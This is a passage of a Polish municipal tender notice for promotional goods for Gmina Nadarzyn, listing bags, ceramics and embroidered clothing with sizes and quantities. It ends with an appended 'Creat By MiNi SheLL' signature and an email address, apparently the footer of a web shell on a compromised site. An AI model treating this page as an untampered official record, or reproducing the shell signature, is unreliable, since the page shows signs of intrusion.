9) Torby papierowe, jasny brąz (ekologiczne), gramatura 170mg/m2 o wymiarach: 23,8cm x 32cm x 9 cm wzmacniane tekturą w miejscu mocowania uchwytów (sznurek bawełniany w kolorze zbliżonym do torby), usztywniane dno o wymiarach 23,8 cm x 9 cm; nadruk (3 kolory) na środku jednej ze stron torby - zgodnie z wizualizacją (szczegóły do ustalenia);
Ilość: 500 sztuk (próbka artykułu do akceptacji zamawiającego).
10) Kubki ceramiczne z uchwytem, białe o pojemności 300 ml, średnicy 8 cm, z trwale nadrukowaną na boku kolorową fotografią urzędu gminy, herbem i napisem - zgodnie z wizualizacją (szczegóły do ustalenia); wielkość nadruku ok. 12cm szerokości x 8cm wysokości; 
Ilość: 500 sztuk (próbka artykułu do akceptacji zamawiającego).
11) Filiżanki ceramiczne z uchem ze spodkami, w kolorze białym, obwód filiżanki: spód 4,2 cm, 8,7cm.; z trwałym nadrukiem (3 kolory) herbu Gminy Nadarzyn oraz napisem Nadarzyn nad herbem; wielkość nadruku: wys. 3 cm. szer. 2,1 cm - zgodnie z wizualizacją (szczegóły do ustalenia) 
Ilość: 200 sztuk (próbka artykułu do akceptacji zamawiającego).
12) Cukiernice ceramiczne z zamknięciem, w kolorze białym, stanowiących komplet z filiżankami, z trwałym nadrukiem (3 kolory) herbu Gminy Nadarzyn oraz napisem Nadarzyn nad herbem; wielkość nadruku: wys. 3 cm szer. 2,1 cm.
Ilość: 5 sztuk (próbka artykułu do akceptacji zamawiającego).

13) Dzbanki do kaw ceramiczne, w kolorze białym, stanowiące komplet z filiżankami, z trwałym nadrukiem (3 kolory) herbu Gminy Nadarzyn oraz napisem Nadarzyn nad herbem; wielkość nadruku: wys. 3 cm szer. 2,1 cm.
Ilość: 5 sztuk (próbka artykułu do akceptacji zamawiającego)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 39.22.11.20-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa reklamowych artykułów odzieżowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część II. Dostawa reklamowych artykułów odzieżowych.
1) Koszulki bawełniane z krótkim rękawem polo (gramatura 200g/m2), kołnierzyk i zakończenie rękawa z tzw. ściągacza; po lewej stronie kolorowy haft (żółty, zielony, czarny) herbu Gminy Nadarzyn; oraz napis nad herbem Nadarzyn; haft umieszczony na lewej piersi; wielkość herbu: 4,8 cm szerokości, 5,7 cm wysokości; napis 0,5 cm nad herbem, wysokość liter: 0,7 cm. Koszulki pakowane pojedynczo w foliowe worki. 
Ilość: 200 sztuk (próbka artykułu do akceptacji zamawiającego).
100 sztuk w kolorze białym - czarny kolor haftu nad herbem Nadarzyn, 
100 sztuk w kolorze ciemnozielonym - żółty kolor haftu nad herbem (taki sam jak kolor tła herbu).
				
2) Koszulki bawełniane t-shirt (białe) ze ściągaczem przy szyi, gramatura 170 g/m2; z sitodrukiem umieszczonym na lewej piersi. Nadruk: kolorowy herb gminy Nadarzyn (żółty, zielony, czarny), nad nim napis w kolorze czarnym Nadarzyn- wielkość herbu: 4,8 cm szerokości, 5,7 cm wysokości; napis 0,5 cm nad herbem, wysokość liter: 0,7 cm. Koszulki pakowane pojedynczo w foliowe worki. 
Ilość: 200 sztuk (próbka artykułu do akceptacji zamawiającego).
20 sztuk w rozmiarze S
20 sztuk w rozmiarze M
70 sztuk w rozmiarze L
70 sztuk w rozmiarze XL
20 sztuk w rozmiarze XXL
			
3) Czapeczki baseballowe (z regulowanym paskiem na rzep), bawełniane z daszkiem, rozmiar uniwersalny, 6 paneli, z kolorowym haftem umieszczonym z przodu czapki, ok. 1,5 cm nad daszkiem; haft: kolorowy (żółty, zielony, czarny) herb Gminy Nadarzyn nad nim czarny napis: Nadarzyn. Wielkość herbu: 2,7 cm x 4 cm, 2 mm na herbem napis Nadarzyn wysokość liter 4-5 mm.
Kolor czapeczek: beżowy, daszek z białą lamówką na brzegu, szerokości 2-3mm.
Ilość: 200 sztuk (próbka artykułu do akceptacji zamawiającego)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.33.10.00-8, 18.44.33.40-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 2.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com